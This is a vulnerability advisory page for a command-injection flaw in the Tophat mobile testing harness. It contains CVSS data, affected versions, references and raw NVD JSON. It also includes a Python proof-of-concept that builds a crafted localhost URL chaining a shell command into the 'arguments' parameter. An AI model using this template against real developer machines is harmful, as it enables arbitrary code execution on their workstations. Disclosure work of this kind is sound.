CVE-2026-39862

Description

Tophat is a mobile applications testing harness. Prior to 2.5.1, Tophat is affected by remote code execution via crafted tophat:// or http://localhost:29070 URLs. The arguments query parameter flows unsanitized from URL parsing through to /bin/bash -c execution, allowing an attacker to execute arbitrary commands on a developer's macOS workstation. Any developer with Tophat installed is vulnerable. For previously trusted build hosts, no confirmation dialog appears. Attacker commands run with the user's permissions. This vulnerability is fixed in 2.5.1.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:shopify:tophat:*:*:*:*:*:*:*:* - VULNERABLE

Tophat < 2.5.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC for CVE-2026-39862
# This script generates a malicious URL that exploits the command injection vulnerability.

import urllib.parse

# Arbitrary command to execute on the macOS workstation
cmd = "open -a Calculator"

# The vulnerable endpoint is the 'arguments' parameter passed to /bin/bash -c
# We use a semicolon to chain commands
payload = f"; {cmd}"

# Construct the malicious URL
# Exploit can be delivered via http://localhost:29070 or tophat:// scheme
base_url = "http://localhost:29070"
params = {"arguments": payload}

malicious_url = f"{base_url}?{urllib.parse.urlencode(params)}"

print(f"[+] Generated Exploit URL:")
print(malicious_url)
print(f"\n[+] If a developer visits this URL (or a trusted build host requests it), '{cmd}' will be executed.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-39862
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-39862
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-39862/
[4] VulDB https://vuldb.com/cve/CVE-2026-39862
[5] https://github.com/Shopify/tophat/pull/139
[6] https://github.com/Shopify/tophat/security/advisories/GHSA-8x8g-6rv5-mgg2

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-39862", "sourceIdentifier": "[email protected]", "published": "2026-04-08T20:16:26.403", "lastModified": "2026-04-20T14:39:51.413", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Tophat is a mobile applications testing harness. Prior to 2.5.1, Tophat is affected by remote code execution via crafted tophat:// or http://localhost:29070 URLs. The arguments query parameter flows unsanitized from URL parsing through to /bin/bash -c execution, allowing an attacker to execute arbitrary commands on a developer's macOS workstation. Any developer with Tophat installed is vulnerable. For previously trusted build hosts, no confirmation dialog appears. Attacker commands run with the user's permissions. This vulnerability is fixed in 2.5.1."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:shopify:tophat:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.5.1", "matchCriteriaId": "A736EDA9-28AE-4C16-90E9-618F58822505"}]}]}], "references": [{"url": "https://github.com/Shopify/tophat/pull/139", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/Shopify/tophat/security/advisories/GHSA-8x8g-6rv5-mgg2", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}